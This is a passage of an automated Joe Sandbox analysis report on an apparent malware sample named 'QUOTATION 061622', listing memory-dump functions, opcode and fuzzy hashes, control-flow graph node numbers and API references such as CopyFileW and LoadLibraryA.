                                                          Uniqueness Score: -1.00%

                                                          Function 04D90488 Relevance: .0, Instructions: 37COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.482325593.0000000004D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D90000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_4d90000_QUOTATION 061622.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 683aa0c610b05027be021ef88145429e74ef80d11a71d2a95f5006c644da0afc
                                                          • Instruction ID: a564734886a363a77d1b957c9747104a3f69faf07872e4e2d73a03bc57baf77c
                                                          • Opcode Fuzzy Hash: 683aa0c610b05027be021ef88145429e74ef80d11a71d2a95f5006c644da0afc
                                                          • Instruction Fuzzy Hash: C601AF6154E3C0AFCB079F3058200643F706E8310434E40EBC4C2CF9A3D9268C4AD723
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 04D90B88 Relevance: .0, Instructions: 34COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.482325593.0000000004D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D90000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_4d90000_QUOTATION 061622.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: a80b59ff49d85c240a025ee0b93e05a812c831755236e1629b90004fe93c39c0
                                                          • Instruction ID: 9f8ac02b22f5b264cc829e8fe8d923e03861266d2c03d9c234986ef4e2ca0af8
                                                          • Opcode Fuzzy Hash: a80b59ff49d85c240a025ee0b93e05a812c831755236e1629b90004fe93c39c0
                                                          • Instruction Fuzzy Hash: E9F02739B009228F4B6D4A4DA42491B72DBEFC667C311803AD549CB714CB30EC01C382
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 04D907E4 Relevance: .0, Instructions: 25COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.482325593.0000000004D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D90000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_4d90000_QUOTATION 061622.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: a8d51de263a14f60bef1988e53488a637a1a50891991c2cae6877dd08e9d2e4e
                                                          • Instruction ID: 318acbccd4530326240e54f82273f1d22524191eea7d1a0f5f76b913b9a19886
                                                          • Opcode Fuzzy Hash: a8d51de263a14f60bef1988e53488a637a1a50891991c2cae6877dd08e9d2e4e
                                                          • Instruction Fuzzy Hash: E0E0E52460E7C58FDB579B2598258203FB2AF4710030A81EBD08ACF6A7DA35A805C722
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 04D91274 Relevance: .0, Instructions: 24COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.482325593.0000000004D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D90000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_4d90000_QUOTATION 061622.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: e47e923c8f7c4b0103393c9a2d8724d374a5c676ebea42f6d236421e700f1c0c
                                                          • Instruction ID: b776f698e6719d1eb13bb985ab3cf6269b364f48d92bfa534c31484cb5221deb
                                                          • Opcode Fuzzy Hash: e47e923c8f7c4b0103393c9a2d8724d374a5c676ebea42f6d236421e700f1c0c
                                                          • Instruction Fuzzy Hash: 13E01A1464F3C26FD71BAB7448260687FB1AE8310434EC1EBC486CE5E3DD19984AD757
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 04D9082C Relevance: .0, Instructions: 24COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.482325593.0000000004D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D90000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_4d90000_QUOTATION 061622.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 66f219b527d84ad0345988f6ae5e84993e245b5e54873ed63cd57bc21568325e
                                                          • Instruction ID: 474c062d6cc97f8da17190fc4df4c411ded914871c163f5dd3d8acce7821e12d
                                                          • Opcode Fuzzy Hash: 66f219b527d84ad0345988f6ae5e84993e245b5e54873ed63cd57bc21568325e
                                                          • Instruction Fuzzy Hash: BAE0923114E3C45FC7135BB458259A97FB1AF0721030A85DFDCC5CB1B3CA654819D752
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 04D9091C Relevance: .0, Instructions: 23COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.482325593.0000000004D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D90000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_4d90000_QUOTATION 061622.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 00220ac9c58dde1b6e927c42592656afad9b366318e291911148c2da7152d892
                                                          • Instruction ID: 6f8d5e6ca65de7853435ecd77152cafe72ac3df90b41e29dd8d4bf7227be2ae4
                                                          • Opcode Fuzzy Hash: 00220ac9c58dde1b6e927c42592656afad9b366318e291911148c2da7152d892
                                                          • Instruction Fuzzy Hash: 5BE0ED3024E3C09FCB174BB048285297F615E8350431985DED685CA1A3DE254449D742
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 04D90F74 Relevance: .0, Instructions: 22COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.482325593.0000000004D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D90000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_4d90000_QUOTATION 061622.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: b685f211ea157b25762a2575f31b384385398681c8757e2c29bd570b25368c2f
                                                          • Instruction ID: c784679ba07b84c444d80358060ecc96543015ad5d77ad56d47bba74c60eaf9e
                                                          • Opcode Fuzzy Hash: b685f211ea157b25762a2575f31b384385398681c8757e2c29bd570b25368c2f
                                                          • Instruction Fuzzy Hash: C0E01A1464E3C18FC7174F3158345697F616E8710838E80EBC0C1CE197EA299815C753
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 04D902B4 Relevance: .0, Instructions: 22COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.482325593.0000000004D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D90000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_4d90000_QUOTATION 061622.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: b1bd6c4f0c62589ce5c3b66c38429dbc73bfec107ecf6ce805036f55cbc3914f
                                                          • Instruction ID: af746f672b2f254a20832df21d3a294787f844f2ffd1a2f300c0c0a0226bf12f
                                                          • Opcode Fuzzy Hash: b1bd6c4f0c62589ce5c3b66c38429dbc73bfec107ecf6ce805036f55cbc3914f
                                                          • Instruction Fuzzy Hash: 71E0E26560E7D24FDB1347786C6D0A8BFB18E5385131A40EBD9C1CA6A3C9080C4AC7A2
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 04D90800 Relevance: .0, Instructions: 17COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.482325593.0000000004D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D90000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_4d90000_QUOTATION 061622.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 1f42c3ee270e738ce0bb771ca2f6b0ab5e8d12a8a1e7bc71a1d162dd63bc6f7e
                                                          • Instruction ID: e370416f0c968319ab8db56afc38f5c042c31b301f24db575cdd18e9f5f26002
                                                          • Opcode Fuzzy Hash: 1f42c3ee270e738ce0bb771ca2f6b0ab5e8d12a8a1e7bc71a1d162dd63bc6f7e
                                                          • Instruction Fuzzy Hash: 43D05E3870450E8F6BADAA59941042633EB7FCA20431480649106CF725DE31FC008692
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 04D90848 Relevance: .0, Instructions: 14COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.482325593.0000000004D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D90000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_4d90000_QUOTATION 061622.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 24c1d03f4381474f2cbf78613e0179bf20c83eea44a3ee219178c7e51bf8262a
                                                          • Instruction ID: bd4d44fb994f0abc809449bab2b3d628ea747cbbbda9ee2ad77a21e031bbab24
                                                          • Opcode Fuzzy Hash: 24c1d03f4381474f2cbf78613e0179bf20c83eea44a3ee219178c7e51bf8262a
                                                          • Instruction Fuzzy Hash: D8C0223220416C674B016AC8A8019EA3B9FEB482B07008026FD0887300CEB28D1093D1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Non-executed Functions

                                                          Function 04E3001F Relevance: 1.5, Instructions: 1471COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.482400520.0000000004E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E30000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_4e30000_QUOTATION 061622.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: ea4185f85aaee3ed77951d5ef08bb085544e979976775d161cc225783b9a123c
                                                          • Instruction ID: 00dea9579a6451ccfa1a8dd42d445416f4a4399be233c6cf00d721b91db5a06c
                                                          • Opcode Fuzzy Hash: ea4185f85aaee3ed77951d5ef08bb085544e979976775d161cc225783b9a123c
                                                          • Instruction Fuzzy Hash: 21E21B70D05628CFCB54EF29E99969CBBB2FB88301F0189E9D448A3394DB346E85CF51
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Execution Graph

                                                          Execution Coverage:16.2%
                                                          Dynamic/Decrypted Code Coverage:100%
                                                          Signature Coverage:0%
                                                          Total number of Nodes:59
                                                          Total number of Limit Nodes:1
                                                          execution_graph 28377 ae0aac0 28378 ae0aae6 28377->28378 28379 ae07620 CopyFileW 28378->28379 28382 ae0ab3f 28378->28382 28380 ae0ab73 28379->28380 28381 ae09270 CopyFileW 28380->28381 28381->28382 28391 ae0d050 28394 ae0d080 28391->28394 28392 ae0d069 28395 ae0d0a6 28394->28395 28396 ae07620 CopyFileW 28395->28396 28399 ae0d100 28395->28399 28397 ae0d134 28396->28397 28398 ae09270 CopyFileW 28397->28398 28398->28399 28399->28392 28366 ae07971 28367 ae079b3 28366->28367 28368 ae07974 28366->28368 28371 ae08a50 28368->28371 28369 ae08a39 28372 ae08a76 28371->28372 28373 ae07620 CopyFileW 28372->28373 28375 ae08add 28372->28375 28374 ae08b14 28373->28374 28374->28375 28376 ae09270 CopyFileW 28374->28376 28375->28369 28376->28375 28383 a8ac928 28384 a8ac946 28383->28384 28387 a8abb14 28384->28387 28386 a8ac97d 28388 a8ae448 LoadLibraryA 28387->28388 28390 a8ae524 28388->28390 28341 ae079e5 28342 ae0d390 28341->28342 28345 ae0d3b0 28342->28345 28343 ae0d399 28346 ae0d3d6 28345->28346 28350 ae0d432 28346->28350 28351 ae07620 28346->28351 28350->28343 28352 ae0764c 28351->28352 28359 ae076b8 28352->28359 28355 ae09270 28356 ae0929e 28355->28356 28357 ae07620 CopyFileW 28356->28357 28358 ae092e4 28357->28358 28362 ae04e7c 28359->28362 28363 ae076f8 CopyFileW 28362->28363 28365 ae0765f 28363->28365 28365->28355 28400 a8a3370 28401 a8a3393 28400->28401 28405 a8a452b 28401->28405 28409 a8a4530 28401->28409 28402 a8a344d 28406 a8a4578 28405->28406 28407 a8a4581 28406->28407 28413 a8a40b8 28406->28413 28407->28402 28410 a8a4578 28409->28410 28411 a8a4581 28410->28411 28412 a8a40b8 LoadLibraryW 28410->28412 28411->28402 28412->28411 28414 a8a4720 LoadLibraryW 28413->28414 28416 a8a4795 28414->28416 28416->28407

                                                          Executed Functions

                                                          Function 09BF90D0 Relevance: 4.6, Strings: 3, Instructions: 826COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 662 9bf90d0-9bf90e8 663 9bf90ee-9bf90f2 662->663 664 9bf9196-9bf919f 662->664 667 9bf91cb-9bf9237 663->667 668 9bf90f8-9bf9100 663->668 665 9bf91a9-9bf91c4 664->665 666 9bf91a1-9bf91a7 664->666 665->667 666->665 678 9bf923e-9bf9248 667->678 669 9bf910e-9bf9123 668->669 670 9bf9102-9bf9104 668->670 669->678 679 9bf9129-9bf912e 669->679 670->669 681 9bf924a-9bf9250 678->681 682 9bf9253-9bf9283 678->682 683 9bf92d9-9bf92e2 679->683 684 9bf9134-9bf913b 679->684 681->682 709 9bf9288-9bf92d2 682->709 710 9bf9285 682->710 686 9bf92ec-9bf9350 683->686 687 9bf92e4-9bf92ea 683->687 693 9bf9357-9bf9360 684->693 694 9bf9141-9bf9149 684->694 686->693 687->686 696 9bf936a-9bf9408 693->696 697 9bf9362-9bf9368 693->697 698 9bf914b-9bf914d 694->698 699 9bf9157-9bf9164 694->699 908 9bf9409 call 9bf90d0 696->908 909 9bf9409 call 9bf90c0 696->909 697->696 698->699 912 9bf9166 call 9bfae7f 699->912 913 9bf9166 call 9bf90d0 699->913 914 9bf9166 call 9bf90c0 699->914 709->683 710->709 712 9bf916c-9bf9174 713 9bf9176-9bf9178 712->713 714 9bf9182-9bf9193 712->714 713->714 734 9bf940f-9bf941e 736 9bf96c5-9bf96e1 734->736 737 9bf9424-9bf9430 734->737 745 9bf96e3 736->745 746 9bf96f2 736->746 740 9bf9443 737->740 741 9bf9432 737->741 747 9bf944b-9bf945f 740->747 742 9bf9438-9bf943d 741->742 743 9bf9822-9bf982b 741->743 742->740 742->743 748 9bf982d-9bf9833 743->748 749 9bf9835-9bf9888 743->749 750 9bf96e9-9bf96ec 745->750 751 9bf98e1-9bf98ea 745->751 753 9bf96f7 746->753 758 9bf988f-9bf9898 747->758 759 9bf9465-9bf9468 747->759 748->749 749->758 750->746 750->751 754 9bf98ec-9bf98f2 751->754 755 9bf98f4-9bf992c 751->755 761 9bf9701-9bf970d 753->761 754->755 775 9bf9933-9bf993c 755->775 762 9bf989a-9bf98a0 758->762 763 9bf98a2-9bf98da 758->763 759->758 760 9bf946e-9bf9474 759->760 760->753 767 9bf947a-9bf9485 760->767 778 9bf97cb-9bf97cf 761->778 779 9bf9713-9bf9717 761->779 762->763 763->751 769 9bf9487-9bf948e 767->769 770 9bf9494-9bf949f 767->770 769->770 769->775 776 9bf94a1-9bf94c1 call 9bf2128 770->776 777 9bf94f0-9bf94f4 770->777 785 9bf993e-9bf9944 775->785 786 9bf9946-9bf997e 775->786 817 9bf94c7-9bf94d6 776->817 818 9bf9985-9bf998e 776->818 783 9bf9508-9bf9512 777->783 784 9bf94f6-9bf9500 777->784 790 9bf955e-9bf95d1 778->790 791 9bf97d5-9bf97fb 778->791 788 9bf9a8f-9bf9a98 779->788 789 9bf971d-9bf9724 779->789 812 9bf9a0b-9bf9a14 783->812 813 9bf9518-9bf954a 783->813 784->783 785->786 786->818 795 9bf9a9a-9bf9aa0 788->795 796 9bf9aa2-9bf9ae1 788->796 793 9bf9769-9bf9791 789->793 794 9bf9726-9bf9764 789->794 910 9bf95d4 call 9bfabe9 790->910 911 9bf95d4 call 9bfabf8 790->911 791->790 800 9bf979d-9bf97c6 793->800 801 9bf9793 793->801 794->790 795->796 854 9bf9ae8-9bf9b73 796->854 800->790 801->800 821 9bf9a1e-9bf9a88 812->821 822 9bf9a16-9bf9a1c 812->822 813->761 833 9bf9550-9bf9553 813->833 817->777 838 9bf94d8-9bf94e6 817->838 824 9bf9998-9bf9a04 818->824 825 9bf9990-9bf9996 818->825 821->788 822->821 824->812 825->824 833->790 838->777 889 9bf9b78-9bf9b90 854->889 867 9bf95da-9bf9603 867->854 876 9bf9609-9bf9614 867->876 879 9bf961a-9bf9672 876->879 880 9bf9800 876->880 883 9bf9807-9bf981f 879->883 900 9bf9678-9bf9685 879->900 880->883 893 9bf9b92-9bf9bdb 889->893 899 9bf9be3-9bf9bf4 893->899 902 9bf9687 900->902 903 9bf9691-9bf96c2 900->903 902->903 908->734 909->734 910->867 911->867 912->712 913->712 914->712
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.577230655.0000000009BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09BF0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_9bf0000_vbc.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: xOjl$xOjl$+\`d^
                                                          • API String ID: 0-3765194386
                                                          • Opcode ID: c92f0615d61bf1e9a30d547acdcb34308852af4c2f5e7b3936080d5ef995c5ef
                                                          • Instruction ID: 0e7f5e5c9162104563a431ecb1f522408bdedff7bd85f56c9af76e9f89cb58d9
                                                          • Opcode Fuzzy Hash: c92f0615d61bf1e9a30d547acdcb34308852af4c2f5e7b3936080d5ef995c5ef
                                                          • Instruction Fuzzy Hash: 10628E34B002049FDB54DBB8C4596AEBBE7EFC8214B248869E50ACB395DF74DC46CB91
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 09BF48F0 Relevance: .3, Instructions: 321COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.577230655.0000000009BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09BF0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_9bf0000_vbc.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: b04bdcf98586b2830ad3c939bf5144a899879a6e23e45648472dc195cb0debd4
                                                          • Instruction ID: 7f0b19e6b0726670367b362816c0f8108aa63dd18ae51a3f26084450dacfd3bf
                                                          • Opcode Fuzzy Hash: b04bdcf98586b2830ad3c939bf5144a899879a6e23e45648472dc195cb0debd4
                                                          • Instruction Fuzzy Hash: F1C17C317006069FDB14DF65C49866FB7E7FF80328F41CDA8D6168B6A1DB70E8898B90
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0A8F0048 Relevance: 34.4, Strings: 27, Instructions: 673COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 0 a8f0048-a8f006e 2 a8f0086-a8f00a2 0->2 3 a8f0070-a8f0076 0->3 8 a8f00a9-a8f00b5 2->8 4 a8f007a-a8f007c 3->4 5 a8f0078 3->5 4->2 5->2 10 a8f00bb-a8f00d2 8->10 11 a8f0728-a8f0731 8->11 10->8 13 a8f00d4 10->13 14 a8f021e-a8f024c 13->14 15 a8f037e-a8f03a1 13->15 16 a8f00db-a8f0101 13->16 17 a8f01a9-a8f01cc 13->17 18 a8f0309-a8f032c 13->18 19 a8f0469-a8f0497 13->19 20 a8f0294-a8f02b7 13->20 21 a8f03f3-a8f0421 13->21 22 a8f0141-a8f01a4 13->22 45 a8f024e-a8f0254 14->45 46 a8f0264-a8f028f 14->46 61 a8f091a-a8f0949 15->61 62 a8f03a7-a8f03ab 15->62 36 a8f0107-a8f013c 16->36 65 a8f0734-a8f0763 17->65 66 a8f01d2-a8f01d6 17->66 68 a8f0878-a8f08a7 18->68 69 a8f0332-a8f0336 18->69 41 a8f04af-a8f04da 19->41 42 a8f0499-a8f049f 19->42 63 a8f02bd-a8f02c1 20->63 64 a8f07d6-a8f0805 20->64 43 a8f0439-a8f0464 21->43 44 a8f0423-a8f0429 21->44 22->8 36->8 41->8 48 a8f04a3-a8f04a5 42->48 49 a8f04a1 42->49 43->8 50 a8f042d-a8f042f 44->50 51 a8f042b 44->51 57 a8f0258-a8f025a 45->57 58 a8f0256 45->58 46->8 48->41 49->41 50->43 51->43 57->46 58->46 85 a8f0950-a8f097f 61->85 71 a8f0986-a8f0d15 62->71 72 a8f03b1-a8f03bb 62->72 73 a8f02c7-a8f02d1 63->73 74 a8f0842-a8f0871 63->74 86 a8f080c-a8f083b 64->86 90 a8f076a-a8f0799 65->90 75 a8f01dc-a8f01e6 66->75 76 a8f07a0-a8f07cf 66->76 93 a8f08ae-a8f08dd 68->93 77 a8f033c-a8f0346 69->77 78 a8f08e4-a8f0913 69->78 84 a8f03c1-a8f03ee 72->84 72->85 73->86 87 a8f02d7-a8f0304 73->87 74->68 89 a8f01ec-a8f0219 75->89 75->90 76->64 77->93 94 a8f034c-a8f0379 77->94 78->61 84->8 85->71 86->74 87->8 89->8 90->76 93->78 94->8
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.578801743.000000000A8F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A8F0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_a8f0000_vbc.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: xP5m$xP5m$xP5m$xP5m$xP5m$xP5m$xP5m$xP5m$xP5m$xP5m$xP5m$xP5m$xP5m$xP5m$xP5m$xP5m$xP5m$xP5m$xP5m$xP5m$xP5m$xP5m$xP5m$xP5m$xP5m$xP5m$xP5m
                                                          • API String ID: 0-1716183063
                                                          • Opcode ID: 93f33dcc27012416474573ab424fb4f0568387b478c894d8bc01b3918e265a22
                                                          • Instruction ID: 634a007521fbed30aaf3a1dab59d59849e7d65658d0da12c9b687c209ff143ac
                                                          • Opcode Fuzzy Hash: 93f33dcc27012416474573ab424fb4f0568387b478c894d8bc01b3918e265a22
                                                          • Instruction Fuzzy Hash: 414278357006199FCB249FA8C050AAEB6F2FFC1619B014E1CC5479F394DBB6E9468BD2
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 09BFBE38 Relevance: 5.1, Strings: 4, Instructions: 84COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 640 9bfbe38-9bfbe81 643 9bfbe89-9bfbe8d 640->643 644 9bfbf38-9bfbf49 643->644 645 9bfbe93-9bfbeb6 643->645 648 9bfbefc-9bfbefe 645->648 649 9bfbeb8-9bfbece 645->649 650 9bfbf04-9bfbf06 648->650 651 9bfbf00-9bfbf02 648->651 656 9bfbed7-9bfbefa 649->656 657 9bfbed0 649->657 652 9bfbf0c-9bfbf0e 650->652 651->652 654 9bfbf26-9bfbf30 652->654 655 9bfbf10-9bfbf16 652->655 654->644 658 9bfbf1a-9bfbf1c 655->658 659 9bfbf18 655->659 656->648 657->656 658->654 659->654
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.577230655.0000000009BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09BF0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_9bf0000_vbc.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: Hr5m$Hr5m$Hr5m$K`d^
                                                          • API String ID: 0-3419098798
                                                          • Opcode ID: 4bbe56a64818f1a3ba3856bb0bb4db890b2da41602d688987ae28bcc7e134992
                                                          • Instruction ID: 5f68d953b012a2263bd00f1cab84bff76d95a0df783778ae97c2cc53e60d4693
                                                          • Opcode Fuzzy Hash: 4bbe56a64818f1a3ba3856bb0bb4db890b2da41602d688987ae28bcc7e134992
                                                          • Instruction Fuzzy Hash: 9F31CE31B002169FCB00DB69D4548AE77F2FF88368B015AA9F10A9B361EB30ED45CB91
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 09BFBE28 Relevance: 3.8, Strings: 3, Instructions: 80COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.577230655.0000000009BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09BF0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_9bf0000_vbc.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: Hr5m$Hr5m$K`d^
                                                          • API String ID: 0-1765794859
                                                          • Opcode ID: ba05da1c626086f461d329967fc7d9c5f690b7198429b0be250d9319e3eb58e2
                                                          • Instruction ID: cdbd22cb6b1a085b92ffd62dbdeb88262d5e973028583fa65f269c7aaa69fd1b
                                                          • Opcode Fuzzy Hash: ba05da1c626086f461d329967fc7d9c5f690b7198429b0be250d9319e3eb58e2
                                                          • Instruction Fuzzy Hash: 0C31E331B00212DFDB00DB68D5509AE77F2FF84364B015AAAE50ADB391EB30ED48CB91
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 09BF4288 Relevance: 1.6, Strings: 1, Instructions: 342COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.577230655.0000000009BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09BF0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_9bf0000_vbc.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: 4P5m
                                                          • API String ID: 0-2743288073
                                                          • Opcode ID: ca1b76478157199994e373ea38c8500800d140d1ed60b956b3006ac313422b28
                                                          • Instruction ID: abfdd1d308807a93062081a9feda562af5e52b6de106970607f2decffdc51345
                                                          • Opcode Fuzzy Hash: ca1b76478157199994e373ea38c8500800d140d1ed60b956b3006ac313422b28
                                                          • Instruction Fuzzy Hash: E8D16F74A00205DFCB14DF64C498AAEBBF2FF88324F1584A9E515AB361DB70ED49CB90
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0A8AE43D Relevance: 1.6, APIs: 1, Instructions: 91libraryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • LoadLibraryA.KERNELBASE(?), ref: 0A8AE512
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.578614016.000000000A8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A8A0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_a8a0000_vbc.jbxd
                                                          Similarity
                                                          • API ID: LibraryLoad
                                                          • String ID:
                                                          • API String ID: 1029625771-0
                                                          • Opcode ID: fae04ad0b39c3e572a1b6f025ed6fdae8cf8319fe402952b01f6a624e1e4397b
                                                          • Instruction ID: cf0ce3d94c86bbc07545c9a1a301a56c4c9d2ae18a680f3304c2bc34dff5606f
                                                          • Opcode Fuzzy Hash: fae04ad0b39c3e572a1b6f025ed6fdae8cf8319fe402952b01f6a624e1e4397b
                                                          • Instruction Fuzzy Hash: 2B3156B0D18659DFEB10CFA8C8947EDBBB1BF18314F148929D855E7280D7749481CF95
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 09BF5E66 Relevance: 1.6, Strings: 1, Instructions: 340COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.577230655.0000000009BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09BF0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_9bf0000_vbc.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: l
                                                          • API String ID: 0-3674992007
                                                          • Opcode ID: b259feef346a37e13b1d15e7060cc7a6c3510fa118579a907e619d71e7b2971a
                                                          • Instruction ID: 24f4d37f71db3fae05d76dca43d95e303e6beb843adc9110c01f51ef63881a94
                                                          • Opcode Fuzzy Hash: b259feef346a37e13b1d15e7060cc7a6c3510fa118579a907e619d71e7b2971a
                                                          • Instruction Fuzzy Hash: 28D1A231A00605DFCB14DF64C4956AEBBF6FF84324F0489A9E8169B395DB70ED4ACB90
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0A8ABB14 Relevance: 1.6, APIs: 1, Instructions: 89libraryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • LoadLibraryA.KERNELBASE(?), ref: 0A8AE512
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.578614016.000000000A8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A8A0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_a8a0000_vbc.jbxd
                                                          Similarity
                                                          • API ID: LibraryLoad
                                                          • String ID:
                                                          • API String ID: 1029625771-0
                                                          • Opcode ID: 878958027b4279d135e1bfd68602df9d690b0be0f71cff887a25d42e6aa8dea9
                                                          • Instruction ID: e82ef53a0e487c3ab3eadb81cfb9e84004220fd6a83692d813d4d548423ea087
